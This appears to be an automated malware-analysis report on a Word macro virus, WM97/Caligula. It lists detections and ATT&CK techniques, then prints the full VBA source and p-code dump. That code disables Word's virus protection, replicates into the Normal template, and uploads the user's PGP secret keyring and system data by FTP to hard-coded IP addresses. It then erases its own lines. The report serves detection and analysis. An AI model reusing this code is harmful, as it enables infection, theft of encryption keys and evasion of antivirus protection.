Verdict: MALICIOUS
Risk Score: 358
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1041 Exfiltration Over C2 Channel
- T1071.004 Exfiltration Over Application Layer Protocol: FTP
- T1047 Windows Management Instrumentation
The sample contains a legacy WordBasic macro that utilizes the Shell() function to execute system commands like 'set' and 'ipconfig'. The output of these commands is intended to be uploaded to an FTP server at '160.63.96.71' using anonymous credentials. The macro also attempts to disable virus protection and self-delete, indicating a malicious intent to evade detection and exfiltrate data.
Heuristics (9)
- ClamAV: Doc.Trojan.Caligula-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Caligula-1
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Shell "command.com /c ftp.exe -n -s:c:\cdbrk.vxd", vbHide`
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Bare IPv4 address in VBA string literal (2 addresses) (low, OLE_VBA_BARE_IPV4_LITERAL): VBA source contains one or more globally-routable IPv4 addresses as plain string literals with no URL scheme. These are commonly C2 or download hosts that only get http:// prepended at runtime, so the normal URL extractors miss them. Surfaced as http://<ip> IOCs. Private, reserved and version/build-shaped values are excluded.
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs referenced by macro: http://209.201.88.110, http://160.63.96.71
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14911 bytes |

SHA-256: b668fee7c95cbf261e80de579b7eb012f6ba1425e59c81e2c0538c6cebf7f957
Detection: ClamAV: Doc.Trojan.Caligula-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Caligula"
Sub AutoOpen()
GoTo cnlabTest
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Opic"
.Title = "WM97/Caligula Infection"
.Subject = "A Study In Espionage Enabled Viruses."
.Comments = "The Best Security Is Knowing The Other Guy Hasn't Got Any."
.Keywords = " | Caligula | Opic | CodeBreakers | "
.Execute
End With
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
CommandBars("tools").Controls("Macro").Enabled = False
CommandBars("tools").Controls("Customize...").Enabled = False
CommandBars("view").Controls("Toolbars").Enabled = False
CommandBars("view").Controls("Status Bar").Enabled = False
If NormalTemplate.VBProject.VBComponents.Item("Caligula").Name <> "Caligula" Then
NotInNorm = True
ActiveDocument.VBProject.VBComponents("Caligula").Export "c:\io.vxd"
Set Dobj = NormalTemplate.VBProject
ElseIf ActiveDocument.VBProject.VBComponents.Item("Caligula").Name <> "Caligula" Then
NotInActiv = True
NormalTemplate.VBProject.VBComponents("Caligula").Export "c:\io.vxd"
Set Dobj = ActiveDocument.VBProject
End If
If NotInNorm = True Or NotInActiv = True Then Dobj.VBComponents.Import ("c:\io.vxd")
If Day(Now) = 31 Then MsgBox "No cia," & vbCr & "No nsa," & vbCr & "No satellite," & vbCr & "Could map our veins.", 0, "WM97/Caligula (c) Opic [CodeBreakers 1998]"
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Caligula") = False) Then
pgppath = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command", "")
Position = InStr(1, pgppath, "pgpt")
If Position <> 0 Then
pgppath = Mid(pgppath, 1, Position - 2)
Else
GoTo noPGP
End If
With Application.FileSearch
.FileName = "\Secring.skr"
.LookIn = pgppath
.SearchSubFolders = True
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
PGP_Sec_Key = .FoundFiles(1)
End With
Randomize
For i = 1 To 4
NewSecRingFile = NewSecRingFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
NewSecRingFile = "./secring" & NewSecRingFile & ".skr"
Open "c:\cdbrk.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "binary"
Print #1, "put """ & PGP_Sec_Key & """ """ & NewSecRingFile & """"
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\cdbrk.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Caligula") = True
End If
noPGP:
If NotInActiv = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
cnlabTest:
Rem
Rem ramdom file name generieren
Rem
Randomize
For i = 1 To 4
NewFile = NewFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
NewFile = "./test" & NewFile & ".txt"
Rem
Rem upload Daten generieren
Rem
Open "c:\cnlab.bat" For Output As #1
Print #1, "set > c:\cnlab.txt"
Print #1, "ipconfig >> c:\cnlab.txt"
Print #1, "ftp.exe -n -s:c:\cnlab.ftp"
Print #1, "del c:\cnlab.ftp c:\cnlab.txt"
Close #1
Open "c:\cnlab.ftp" For Output As #2
Print #2, "o 160.63.96.71"
Print #2, "user anonymous"
Print #2, "pass itsme@"
Print #2, "cd upload"
Print #2, "ascii"
Print #2, "put ""c:\cnlab.txt"" """ & NewFile & """"
Print #2, "quit"
Close #2
Rem
Rem ftp durchführen
Rem
Shell "command.com /c c:\cnlab.bat", vbHide
Rem
Rem aufräumen
Rem
' Shell "command.com /c del c:\cnlab.bat", vbHide
ActiveDocument.VBProject.VBComponents("Caligula").CodeModule.DeleteLines StartLine:=2, Count:=130
ActiveDocument.Save
End Sub
' Processing file: /tmp/qstore__1zxn0bb
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Caligula - 9802 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' Line #2:
' GoTo cnlabTest
' Line #3:
' Line #4:
' OnError (Resume Next)
' Line #5:
' Line #6:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #7:
' LitStr 0x0004 "Opic"
' MemStWith Author
' Line #8:
' LitStr 0x0017 "WM97/Caligula Infection"
' MemStWith Title
' Line #9:
' LitStr 0x0025 "A Study In Espionage Enabled Viruses."
' MemStWith Subject
' Line #10:
' LitStr 0x003A "The Best Security Is Knowing The Other Guy Hasn't Got Any."
' MemStWith Comments
' Line #11:
' LitStr 0x0024 " | Caligula | Opic | CodeBreakers | "
' MemStWith Keywords
' Line #12:
' ArgsMemCallWith Execute 0x0000
' Line #13:
' EndWith
' Line #14:
' Line #15:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #16:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #17:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #18:
' Line #19:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #20:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayStatusBar
' Line #21:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #22:
' Line #23:
' LitVarSpecial (False)
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #24:
' LitVarSpecial (False)
' LitStr 0x000C "Customize..."
' LitStr 0x0005 "tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #25:
' LitVarSpecial (False)
' LitStr 0x0008 "Toolbars"
' LitStr 0x0004 "view"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #26:
' LitVarSpecial (False)
' LitStr 0x000A "Status Bar"
' LitStr 0x0004 "view"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #27:
' Line #28:
' LitStr 0x0008 "Caligula"
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0008 "Caligula"
' Ne
' IfBlock
' Line #29:
' LitVarSpecial (True)
' St NotInNorm
' Line #30:
' LitStr 0x0009 "c:\io.vxd"
' LitStr 0x0008 "Caligula"
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #31:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' Set Dobj
' Line #32:
' LitStr 0x0008 "Caligula"
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0008 "Caligula"
' Ne
' ElseIfBlock
' Line #33:
' LitVarSpecial (True)
' St NotInActiv
' Line #34:
' LitStr 0x0009 "c:\io.vxd"
' LitStr 0x0008 "Caligula"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #35:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' Set Dobj
' Line #36:
' EndIfBlock
' Line #37:
' Line #38:
' Ld NotInNorm
' LitVarSpecial (True)
' Eq
' Ld NotInActiv
' LitVarSpecial (True)
' Eq
' Or
' If
' BoSImplicit
' LitStr 0x0009 "c:\io.vxd"
' Paren
' Ld Dobj
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' EndIf
' Line #39:
' Line #40:
' Ld Now
' ArgsLd Day 0x0001
' LitDI2 0x001F
' Eq
' If
' BoSImplicit
' LitStr 0x0007 "No cia,"
' Ld vbCr
' Concat
' LitStr 0x0007 "No nsa,"
' Concat
' Ld vbCr
' Concat
' LitStr 0x000D "No satellite,"
' Concat
' Ld vbCr
' Concat
' LitStr 0x0014 "Could map our veins."
' Concat
' LitDI2 0x0000
' LitStr 0x002A "WM97/Caligula (c) Opic [CodeBreakers 1998]"
' ArgsCall MsgBox 0x0003
' EndIf
' Line #41:
' Line #42:
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0008 "Caligula"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitVarSpecial (False)
' Eq
' Paren
' IfBlock
' Line #43:
' Line #44:
' LitStr 0x0000 ""
' LitStr 0x0037 "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command"
' LitStr 0x0000 ""
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St pgppath
' Line #45:
' LitDI2 0x0001
' Ld pgppath
' LitStr 0x0004 "pgpt"
' FnInStr3
' St Position
' Line #46:
' Line #47:
' Ld Position
' LitDI2 0x0000
' Ne
' IfBlock
' Line #48:
' Ld pgppath
' LitDI2 0x0001
' Ld Position
' LitDI2 0x0002
' Sub
' ArgsLd Mid$ 0x0003
' St pgppath
' Line #49:
' ElseBlock
' Line #50:
' GoTo noPGP
' Line #51:
' EndIfBlock
' Line #52:
' Line #53:
' StartWithExpr
' Ld Application
' MemLd FileSearch
' With
' Line #54:
' LitStr 0x000C "\Secring.skr"
' MemStWith FileName
' Line #55:
' Ld pgppath
' MemStWith LookIn
' Line #56:
' LitVarSpecial (True)
' MemStWith SearchSubFolders
' Line #57:
' LitVarSpecial (True)
' MemStWith MatchTextExactly
' Line #58:
' Ld msoFileTypeAllFiles
' MemStWith FileType
' Line #59:
' ArgsMemCallWith Execute 0x0000
' Line #60:
' LitDI2 0x0001
' ArgsMemLdWith FoundFiles 0x0001
' St PGP_Sec_Key
' Line #61:
' EndWith
' Line #62:
' Line #63:
' ArgsCall Read 0x0000
' Line #64:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' Line #65:
' Ld NewSecRingFile
' LitDI2 0x0008
' Ld Rnd
' Mul
' FnInt
' ArgsLd Str 0x0001
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Add
' St NewSecRingFile
' Line #66:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #67:
' LitStr 0x0009 "./secring"
' Ld NewSecRingFile
' Concat
' LitStr 0x0004 ".skr"
' Concat
' St NewSecRingFile
' Line #68:
' Line #69:
' LitStr 0x000C "c:\cdbrk.vxd"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #70:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0010 "o 209.201.88.110"
' PrintItemNL
' Line #71:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "user anonymous"
' PrintItemNL
' Line #72:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "pass itsme@"
' PrintItemNL
' Line #73:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "cd incoming"
' PrintItemNL
' Line #74:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "binary"
' PrintItemNL
' Line #75:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0005 "put ""
' Ld PGP_Sec_Key
' Concat
' LitStr 0x0003 "" ""
' Concat
' Ld NewSecRingFile
' Concat
' LitStr 0x0001 """
' Concat
' PrintItemNL
' Line #76:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "quit"
' PrintItemNL
' Line #77:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #78:
' Line #79:
' LitStr 0x0029 "command.com /c ftp.exe -n -s:c:\cdbrk.vxd"
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #80:
' Line #81:
' LitVarSpecial (True)
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0008 "Caligula"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #82:
' Line #83:
' EndIfBlock
' Line #84:
' Line #85:
' Label noPGP
' Line #86:
' Line #87:
' Ld NotInActiv
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' EndIf
' Line #88:
' Line #89:
' Label cnlabTest
' Line #90:
' Line #91:
' Rem 0x0000 ""
' Line #92:
' Rem 0x001C " ramdom file name generieren"
' Line #93:
' Rem 0x0000 ""
' Line #94:
' ArgsCall Read 0x0000
' Line #95:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' Line #96:
' Ld NewFile
' LitDI2 0x0008
' Ld Rnd
' Mul
' FnInt
' ArgsLd Str 0x0001
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Add
' St NewFile
' Line #97:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #98:
' LitStr 0x0006 "./test"
' Ld NewFile
' Concat
' LitStr 0x0004 ".txt"
' Concat
' St NewFile
' Line #99:
' Line #100:
' Rem 0x0000 ""
' Line #101:
' Rem 0x0018 " upload Daten generieren"
' Line #102:
' Rem 0x0000 ""
' Line #103:
' LitStr 0x000C "c:\cnlab.bat"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #104:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0012 "set > c:\cnlab.txt"
' PrintItemNL
' Line #105:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0018 "ipconfig >> c:\cnlab.txt"
' PrintItemNL
' Line #106:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "ftp.exe -n -s:c:\cnlab.ftp"
' PrintItemNL
' Line #107:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001D "del c:\cnlab.ftp c:\cnlab.txt"
' PrintItemNL
' Line #108:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #109:
' Line #110:
' LitStr 0x000C "c:\cnlab.ftp"
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Output)
' Line #111:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x000E "o 160.63.96.71"
' PrintItemNL
' Line #112:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x000E "user anonymous"
' PrintItemNL
' Line #113:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x000B "pass itsme@"
' PrintItemNL
' Line #114:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0009 "cd upload"
' PrintItemNL
' Line #115:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0005 "ascii"
' PrintItemNL
' Line #116:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0014 "put "c:\cnlab.txt" ""
' Ld NewFile
' Concat
' LitStr 0x0001 """
' Concat
' PrintItemNL
' Line #117:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0004 "quit"
' PrintItemNL
' Line #118:
' LitDI2 0x0002
' Sharp
' Close 0x0001
' Line #119:
' Line #120:
' Rem 0x0000 ""
' Line #121:
' Rem 0x0010 " ftp durchführen"
' Line #122:
' Rem 0x0000 ""
' Line #123:
' LitStr 0x001B "command.com /c c:\cnlab.bat"
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #124:
' Line #125:
' Rem 0x0000 ""
' Line #126:
' Rem 0x000A " aufräumen"
' Line #127:
' Rem 0x0000 ""
' Line #128:
' QuoteRem 0x0000 0x0030 " Shell "command.com /c del c:\cnlab.bat", vbHide"
' Line #129:
' LitDI2 0x0002
' ParamNamed StartLine
' LitDI2 0x0082
' ParamNamed Count
' LitStr 0x0008 "Caligula"
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #130:
' Line #131:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #132:
' EndSub